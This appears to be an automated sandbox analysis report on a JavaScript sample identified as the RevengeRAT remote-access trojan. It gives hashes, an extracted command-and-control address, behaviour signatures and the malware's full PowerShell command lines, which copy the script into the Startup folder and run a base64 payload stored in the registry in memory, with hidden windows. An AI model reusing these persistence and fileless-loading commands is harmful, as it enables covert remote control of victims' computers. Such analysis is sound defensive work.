Analysis
-
max time kernel
122s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-09-2024 09:41
Static task
static1
Behavioral task
behavioral1
Sample
6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js
Resource
win10v2004-20240802-en
General
-
Target
6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js
-
Size
119KB
-
MD5
5f05f5c7e4e19da45e124065d6f5fd1e
-
SHA1
12be89e5beb8ad794235f16bf29dc36a56d012af
-
SHA256
6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22
-
SHA512
2776bd209d50a93a17077c958f31378c1972b054e6aa42a398fc1a9a1f5c69bd8b79d04fd46a07b1b65996c2b6bf6c3032c95e09009655532e62e6540403d5a6
-
SSDEEP
1536:0+fUYZPT8sYJHkWF5qBKoy1XtczvzYFNW+Nn:nfLasWHtuY1XtcbsFNW+Nn
Malware Config
Extracted
revengerat
NyanCatRevenge
18.231.150.177:5222
282ac7d305
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 2564 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2764 powershell.exe 2564 powershell.exe 2676 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2764 powershell.exe 2676 powershell.exe 2564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2764 3028 wscript.exe 30 PID 3028 wrote to memory of 2764 3028 wscript.exe 30 PID 3028 wrote to memory of 2764 3028 wscript.exe 30 PID 2764 wrote to memory of 2348 2764 powershell.exe 32 PID 2764 wrote to memory of 2348 2764 powershell.exe 32 PID 2764 wrote to memory of 2348 2764 powershell.exe 32 PID 2348 wrote to memory of 2676 2348 wscript.exe 33 PID 2348 wrote to memory of 2676 2348 wscript.exe 33 PID 2348 wrote to memory of 2676 2348 wscript.exe 33 PID 2348 wrote to memory of 2564 2348 wscript.exe 35 PID 2348 wrote to memory of 2564 2348 wscript.exe 35 PID 2348 wrote to memory of 2564 2348 wscript.exe 35
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js'));wscript 'C:\Users\Admin\AppData\Roaming\6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Roaming\6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js3⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22.js'))"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mastercoca').mastercoca;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
59KB
MD5e9dd8e7412f2f40bf00bbb0e40055a40
SHA1718625814199c7b89012f21564c46298c72ba698
SHA256fa317dc427e8220fb94c7cad40a0f513462d46851477b4c1cdef7bc49eb9a7e2
SHA512c0501746cd0bd537dc7ae13b8e34c543c84eeb84b34ae6f4c49f8b4d395becd4595e0dad95c0f24631cb8a29232d0f1a4047ede54a49b5213ecaba4d6224728e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4H36JD1QQ5PMDN88VNOL.temp
Filesize7KB
MD541a28deadb5a7a61ee4ad848cf3cc6a1
SHA17b234c71a115a112ffbe4fc6e0e070c4ee05b057
SHA256791092d32933a1ef61f68378647b7e760936d419161823e589ee9cf74a9fe867
SHA5125b678b5cc7bfcf86b89dde211a8b8f50370263572829117cac256fda4a7cbfe0737e10e768e65ce5a3147892d7a19aa07f0b0f0cb3d39ed908c45470cbaabb9e